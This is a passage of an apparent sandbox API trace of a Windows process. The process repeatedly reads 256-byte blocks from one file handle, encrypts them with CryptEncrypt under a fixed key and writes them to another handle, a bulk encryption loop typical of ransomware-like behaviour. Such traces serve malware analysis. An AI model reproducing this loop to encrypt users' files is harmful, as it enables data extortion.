hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.511] GetLastError () returned 0x0 [0204.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.511] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.511] GetLastError () returned 0x0 [0204.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.511] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.511] GetLastError () returned 0x0 [0204.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.511] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.511] GetLastError () returned 0x0 [0204.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.512] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.512] GetLastError () returned 0x0 [0204.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.512] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.512] GetLastError () returned 0x0 [0204.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.512] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.512] GetLastError () returned 0x0 [0204.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.512] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.512] GetLastError () returned 0x0 [0204.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.512] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.512] GetLastError () returned 0x0 [0204.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.513] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.513] GetLastError () returned 0x0 [0204.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.513] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.513] GetLastError () returned 0x0 [0204.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.513] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.513] GetLastError () returned 0x0 [0204.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.513] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.513] GetLastError () returned 0x0 [0204.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.513] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.513] GetLastError () returned 0x0 [0204.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.513] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.514] GetLastError () returned 0x0 [0204.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.514] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.514] GetLastError () returned 0x0 [0204.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.514] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.514] GetLastError () returned 0x0 [0204.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.514] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.514] GetLastError () returned 0x0 [0204.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.514] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.514] GetLastError () returned 0x0 [0204.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.515] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.515] GetLastError () returned 0x0 [0204.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.515] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.515] GetLastError () returned 0x0 [0204.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.515] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.515] GetLastError () returned 0x0 [0204.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.515] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.515] GetLastError () returned 0x0 [0204.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.515] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.515] GetLastError () returned 0x0 [0204.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.515] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.515] GetLastError () returned 0x0 [0204.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.516] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.516] GetLastError () returned 0x0 [0204.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.516] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.516] GetLastError () returned 0x0 [0204.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.516] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.516] GetLastError () returned 0x0 [0204.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.516] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.516] GetLastError () returned 0x0 [0204.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.517] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.517] GetLastError () returned 0x0 [0204.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.517] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.517] GetLastError () returned 0x0 [0204.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.517] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.517] GetLastError () returned 0x0 [0204.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.517] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.517] GetLastError () returned 0x0 [0204.517] 